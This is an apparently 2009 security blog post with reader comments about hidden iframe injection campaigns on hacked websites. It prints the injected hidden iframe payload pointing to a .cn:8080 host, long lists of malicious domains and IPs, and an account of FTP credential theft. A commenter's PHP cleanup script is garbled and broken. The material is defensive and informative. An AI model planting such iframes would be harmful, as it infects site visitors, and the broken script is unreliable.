Hidden CN Iframes Are Still Prevalent
This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Port 8080
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.
DNS records
All those .cn domains point at the same IP address, or rather, at the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the rest four will still be working.
Here is the output of the dig command that shows 5 “A” records (June 22):
$ dig shopmoviefestival.cn
...
;; QUESTION SECTION:
;shopmoviefestival.cn. IN A
;; ANSWER SECTION:
shopmoviefestival.cn. 432 IN A 77 .37 .19 .173
shopmoviefestival.cn. 432 IN A 88 .191 .78 .48
shopmoviefestival.cn. 432 IN A 89 .171 .115 .10
shopmoviefestival.cn. 432 IN A 90 .156 .144 .78
shopmoviefestival.cn. 432 IN A 91 .121 .146 .101
...
This set of IP addresses changes over the time as some servers become unavailable. At the moment of this article publication (June 25) the set of A records looks like this:
[ 90 .156 .144 .78 ], [ 77 .37 .19 .179 ], [ 77 .37 .18 .36 ], [ 77 .37 .19 .43 ], [ 77 .37 .19 .173 ].
Not only .cn domains
A couple of days ago I noticed similar hidden iframes with .pl domains in URLs.
a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80
No wonder, these domains link to the same set of 5 IPs.
Update (June 29, 2009): Have found similar iframes with .ru domains in URLs: a3h .ru and a5l .ru
Update (July 8, 2009): Have found similar iframe with .at domain in URL: a3l .at
Update (July 21, 2009): Now we have .in: q3e .in and q3t .in
Here are some other domain names that you may encounter as a source parameter of those hidden iframes:
- combinebet .cn
- hugetoplocate .cn
- hugebestbuy .cn
- globalnameshop .cn
- yournameshop .cn
- shopfilmlifeonline .cn
- superfilmlife .cn
- filmlifeimages .cn
- shopfilmlifeforce .cn
- shopvideocommission .cn
- bigtopcreative .cn
- bigtopleads .cn
- bigtopstudios .cn
- gianttopnano .cn
- coolnamemart .cn
- bestlitevideo .cn
- yourlotcar .cn
- namegamestore .cn
- thehomename .cn
- shopmoviefestival .cn
- shopmovielife .cn
- filmbridgelife .cn
- shoponlinefilmsite .cn
- yourfilmlife .cn
- shopfilmexistence .cn
- gianthighest .cn
- more
Detection
Hidden iframes are easily detected by Unmask Parasites.
Removal
You can find the clean up instructions in my original post about the .cn iframes. They include malware removal from a local computer, changing and securing FTP passwords and finally uploading a clean website copy from a backup.
Finally if your site is blacklisted by Google, request a malware review via Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.
As always, any comments are welcome.
Similar posts:
Reader's Comments (32)
Leave a Comment
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
Just got one of these attacks today. Such a bother to stop in the middle of work and have to start up AVG and clean up the mess. Thank god it only infected one of the websites.
Muchos Gracias for the info about clearing up the problem.
I have a theory about the use of port 8080:
http://wirewatcher.wordpress.com/2009/06/26/sidestepping-inline-url-content-filters/
Thanks. Interesting thoughts about traffic filtering.
I’ll be posting new domains names used in this attack here:
bestfilmlife .cn, mediahomenameshopmovie .cn, shopfilmlifescience .cn, bigtopbrands .cn, bigtopstats .cn, brandnameshoppin .cn, turbonamestore .cn, mixgrouptravel .cn, findyourbigwhy .cn, thebestwaytofind .cn, mybetsportswager .cn, shopvideofest .cn, martpictureexistence .cn, namezeroshop .cn, shopfilmworld .cn, litetopfindguide .cn, shoppicturelife .cn, liteautogreatest .cn, nonfathighestlocate .cn, findabigrig .cn, ultralitecar .cn, jumbobestrate .cn, solmixgroup .cn, cubanbigtop .cn, premiumnonfat .cn, newnetnameshop .cn, greatshopfilm .cn, bestmortgagefind .cn, michaelsbestway2findalawyer .cn, casinoslotbet .cn, greatbetpoker .cn, mymixwager.cn
a3j .pl
39j .ru, 39q .ru, 39t .ru, 39w .ru, 39y .ru, 3a2 .ru, 3b6 .ru, 3b8 .ru, 3bf .ru, 3bp .ru, 3bq. .ru, 3c9 .ru, 3cf .ru, 3cw .ru, 3e0 .ru, 3f2 .ru, 3f8 .ru, 3f9 .ru,
a3j .ru, a3l .ru, a3q .ru, a3t .ru, a5m .ru, a5f .ru, a5h .ru, a5g .ru, a5i .ru, a5j .ru,
b1a .ru, b3a .ru, b5c .ru, b5z .ru, b7g .ru, b7p .ru, b8e .ru,
c1z .ru, c3q .ru, c5p .ru, c5y .ru, c6y .ru, c7h .ru,
q0a .ru, q0c .ru, q0l .ru, q1b .ru, q1k .ru, q1m .ru, q1u .ru, q3s .ru, q40 .ru, q41 .ru, q5a .ru, q5c .ru, q5l .ru, q5m .ru, q5u .ru, q5v .ru,
u0c .ru, u0s .ru, u0t .ru, u1a .ru, u1b .ru, u1l .ru, u1w .ru, u3w .ru, u5c .ru, u5d .ru, u5l .ru, u5w .ru, u6b .ru, u6c .ru, u6k .ru, u6l. ru, u7e .ru, u7g .ru, u7o .ru, u7z.ru, u8r .ru, u9a .ru, u9b .ru, u9i .ru
x3y .ru, x5o .ru, x6i .ru, x7o .ru, x8c .ru, x8e .ru, x8m .ru, x8n .ru, x8o .ru, x8v .ru, x9o .ru, x9v .ru, x9w .ru, x9y .ru, xf0 .ru, xf8 .ru, xi3 .ru, xj5 .ru, xq9 .ru, xv9 .ru
6w2 .ru
q1n .in, q1x .in, q5n .in, q5y .in,
u0r .in, u19 .in, u1j .in, u3h .in
x0a .in, x1g .in, x3v .in, x6p .in, x0q .in, x7b .in, x8l .in, x8u .in, x9d .in, xb4 .in, xc6 .in, xh9 .in, xg8 .in, xt6 .in,
bqtl.in, gqil. in, oufc .in, soac .in
b6l .at, b9g .at, c1z .at, c6y .at, f5l .at, f7p .at,
sexfinish .ru, red-wolf .ru, xuiligan .ru, bogoxulstvo .ru, pornishe .ru, sexsila .ru, past-another-life .ru, some-other-life .ru, theanotherlife .ru, last-another-life .ru, oneanotherlife .ru, previous-life .ru, life-before .ru, formerlife .ru, bestage .ru, agebee .ru, age-free .ru, inother .ru, age-free .ru, biozavr .ru, bio-tube .ru, yourbio .ru, youbio .ru, bio-age .ru, beo-free .ru, sexsila .ru, 18-plus .ru, age-t .ru, icq-mobila .ru, telicq .ru, ageend .ru, ageegle .ru, age-inf .ru, ageinf .ru, ageee .ru, what-is-your-iq .ru, lifoon .ru, offiget .ru, sexfinish .ru, test-medicine .ru, your-great-mind .ru, on-liffe .ru, realnisex .ru, kasnis .ru, bitest .ru, pornovoina .ru, bigargazm .ru, 911test .ru, riday .ru, ridai .ru, xxxtaina .ru, bruzg .ru, traxnolog .ru, theprevious .ru, the-previous-life .ru, deathtesting .ru, the-past .ru, doxyia .ru, onelifebefore .ru, before-this-life .ru, onetherlife .ru, bestbeo .ru, soul-of-man .ru, soulinyou .ru, privius-life .ru, former-life .ru, bestbio .ru, bionaft .ru, testbio .ru, hochesh-li .ru, before-life .ru, biovoz. ru, life-death-test .ru, moya-podruga .ru, agefree .ru, b-i-o-v .ru, age-ega .ru, bio-v .ru, bio-vozrast .ru, check-your-iq .ru, age-t .ru, t-age .ru, bio-a .ru, icq-tel .ru, soulinyou .ru, styleicq .ru, samsungicq .ru, nokiaicq .ru, qiiiq .ru, iqste .ru, age-age .ru, dedlife .ru
I can add some more, too:
bigtopmanagement .cn
lotwager .cn
And possibly also related:
mialo-goodle dot info / cn.php ? mkx
…although that last one doesn’t resolve at the moment.
I’m monitoring a site with a .cn:8080 defacement. This has now changed to:
hxxp: / / b1a dot ru : 8080 / index dot php
Hi, I work for a hosting company and we’re seeing so many of these attacks. Driving me insane, but thanks for the blog, it’s helped me keep on top of this mess.
Hi Ivy,
Have you worked out how the bad guys are getting in? Via stolen FTP/ssh credentials?
alec
Hello friends,
as i was also facing the same problem but after changing my FTP password i sovled the problem. so try to change your ftp password. and enjoy .
Regards,
Balmukund Gohil
Web Designer
9819889092.
We got hit too, right at the end of June. They injected their iframe code, exactly like that posted above but with the bigtopbrands domain and slightly different dimensions, right after the body tag in every file with “index”, “home”, or “main” in the name. This resulted in a gap of a hundred or so pixels at the top of each affected page when viewed in a browser, so fortunately I could see something was wrong right away and get it fixed. Also, the last couple lines of each modified page were missing.
I found the attack in our logs, and as near as I can tell, here’s what happened.
They logged in using our FTP credentials. (We are guessing they got them by using an exploit in Adobe Reader v8.) They downloaded one file, index.htm, and then logged out. This took a total of three seconds from connection to logout.
Three seconds after they logged out, they logged back in from a completely different IP, uploaded the modified version of the file they’d just downloaded, and logged back out. Again, this took just three seconds to do.
Five seconds later, they logged back in from yet another IP and downloaded another index file (I have one in each subdirectory). In a total of five seconds, they had it and logged out.
Three seconds later, a fourth IP logged in and uploaded that index file with their code added, then logged out.
This cycle repeated until they had injected their code into all the targeted files on my entire site, including a forum (which their code or the missing last lines broke, another big clue something was amiss).
Out of 208 total logins, only 17 IPs were used twice, and only one was used 3 times. All the rest were unique. They resolve to countries all over the world- India, Nepal, Hong Kong, Argentina, the U.S., Australia, Canada, Japan, Hungary, and Brazil, to name just a random few.
The entire attack took just over an hour, so if you have a lot of index-type files like I do and happen to catch them in the act, changing your FTP password should stop them (then immediately follow the posted clean-up instructions), but blocking IPs won’t affect them for even a moment- there are just too many.
Thanks for the post. It gave me some great insight into exactly what happened to us and how.
Hi Mac,
Thanks for sharing this info. This is a great description of a distributed attack.
Hi Mac,
I gave the change-your-FTP-credentials advice to a customer, but it didn’t stop the defacements.
Here’s why:
The customer’s local machine had password-stealing malware on it that was uploading his FileZilla settings. He would change the FTP password on the server, and then change it in FileZilla. Soon after he did that, the new FileZilla passwords got uploaded, and his site was defaced again!
Take care if you’re using FileZilla, and don’t use it to store your passwords!
alec
Wow, that’s bad news. FileZilla is like the best FTP progs to use. Is FileZilla doing something to prevent this from happening?
I posted my experience as well, but so far I have not been helped yet, I’m not sure if my PCs are cleaned yet so I dare not change anything on my FTP Program yet.. I just asked my hosting guy to change my password for me
Here’s my post
http://forum.lowyat.net/index.php?act=ST&f=25&t=1091018&st=0#entry27188734
I’m not sute how the malware steals FTP credentials. In case it estracts them from program configuration files, you can try not to save passwords inside your FTP client. Just type them in every time you connect to your server.
Another option is to create an alias for your site domain in the “hosts” file and use this alias in FTP program settings. This alias will be useless if used from another computer.
FileZilla also has a Public Key Authentication option (I didn’t try it though)
The most interesting thing is that the guys who were defacing the website seem to know the guys who had the password-stealer on my customer’s PC. They may even be one-and-the-same party, although that could be tricky to prove.
alec
Hi Denis,
In this specific instance, LDPinch was responsible:
http://www.viruslist.com/en/viruses/encyclopedia?virusid=147349
I actually saw the FileZilla usernames/passwords get uploaded to Hacker HQ (along with a load of other stuff). The article above says that the upload is made via SMTP, but this time it was via an HTTP POST request to a .cn domain hosted in Ukraine.
Quite scary, really!
alec
Alec,
Great link to the viruslist. It explains how malware steals passwords. Why sniff traffic or intercept key strokes (this activity can be easily detected by antivirus tools) when you can simple read everything from disk where FTP programs store users’ credentials in plain text
Just got one of these attacks today. My domain is [dot]com[dot]ar -Argentina-. Every index.htm and index.php has the iframe. I´m working with Joomla 1.5, if this helps someone.
I guess i’ll reinstall the whole e-commerce site.
Three more:
shopmovieproduction .cn
b7p .ru
nyfilmlife .cn
“to err is human”
Was only two more :) b7p .ru was already listed :)_
I found “q38 .ru” appearing in http://www .tresearchexpo.nrct .go .th (a Thailand gov’t web site) via Unmask Parasites. This must be a malicious URL.
It really is. Good find!
A client of mine was also targeted. Addresses used:
06-07-2009 >> u1w .ru
08/07/2009 >> u8r .ru
10-07-2009 >> update .cn
12-07-2009 >> u9j .ru
24-07-2009 >> xe5 .in
My client is on a holiday, so i can’t change the FTP pass. Because I have to clean the site every other day, I wrote a script that does that for me. By calling the script every hour with a dronjob, the site keeps clean until she comes back.
Here’s the script. I hope it’s useful for other people.
(make sure to backup your site befor using this one)
<?php
$path = ".";//define the path as relative
// filenames infected in Joomla sites:
list_dir($dir_handle,$path,'index.php');
list_dir($dir_handle,$path,'index2.php');
list_dir($dir_handle,$path,'index3.php');
list_dir($dir_handle,$path,'mainbody.php');
list_dir($dir_handle,$path,'index.html');
function list_dir($dir_handle,$path,$filename)
{
$dir_handle = @opendir($path) or die("unable to open $path");
while (false !== ($file = readdir($dir_handle))) {
$dir =$path.'/'.$file;
if(is_dir($dir) && $file != '.' && $file !='..' )
{
$handle = @opendir($dir) or die("unable to open file $file");
list_dir($handle, $dir, $filename);
}
elseif($file != '.' && $file !='..')
{
if(strcmp("$file", "$filename")==0)
{
$handle = file_get_contents($dir);
if ($handle)
{
preg_match('/]*>(.*)/s’, $handle, $iframe); // find iframes
$hacked = str_replace(“<", ">", (str_replace("<", "<", $iframe[0]))); // sanitize HTML for viewing
if ($hacked)
{
echo "\n$dir $hacked”;
$cleaned = preg_replace(“#$iframe[0]#”, ”, $handle);
$thisfile = fopen($dir, w) or die(“unable to open file $file”);
fwrite($thisfile, $cleaned);
fclose($thisfile);
echo ‘(cleaned)‘;
}
}
}
}
else {
//do nothing
}
}
closedir($dir_handle);
}
?>
Dear Denis,
could you explain how could this spyware injure our computer? Where should(n’t) we click to (avoid) the injuries?
Thanks!
A few more URLs for you:
http ://q3c .ru:8080/index.php
http ://q1e .ru:8080/index.php
http ://x8o .ru:8080/ts/in.cgi?pepsi114
We had almost every index.html, index.php and several other files infected with these iframes on our server.
Found another on one of my clients’ sites:
http ://b9g .at:8080/index.php
i got infected with http ://some-other-life .ru:8080/index.php- good thing i have a back up of the files on my wordpress blog and able to restore it. The problem is that the attack me reoccur. damn.
To prevent reinfections you should remove malware from your computer, change FTP passwords and keep them secure.
You might want to read this post about how the malware works and why you shouldn’t save passwords in FTP clients.
oh, no im being attacked again, help.
I don’t know if the problem attacking one of the servers that I visit is this particular problem but the when my browser popped up w/ a warning and a Google SafeBrowsing report, one of the links that was apparently hosting malware was visaforchina .co .uk
[...] also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from configuration files of 10 popular FTP [...]